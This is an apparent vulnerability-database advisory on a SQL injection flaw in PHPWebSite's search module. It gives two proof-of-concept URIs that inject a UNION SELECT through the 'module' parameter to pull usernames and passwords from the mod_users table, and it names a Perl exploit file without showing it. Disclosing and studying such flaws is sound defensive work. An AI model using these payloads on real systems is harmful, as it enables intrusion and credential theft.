PHPWebSite Search Module SQL Injection Vulnerability

info
discussion
exploit
solution
references

PHPWebSite Search Module SQL Injection Vulnerability

No exploit is required.

The following proof of concept URI are available:
http://www.example.com/index.php?module='+UNION+select+username,username+from+mod_users+where+user_id='1'/*
http://www.example.com/index.php?module='+UNION+select+username,password+from+mod_users+where+user_id='1'/*

x97Rang has supplied the following exploit:

/data/vulnerabilities/exploits/phpwebsite-sql-inj.pl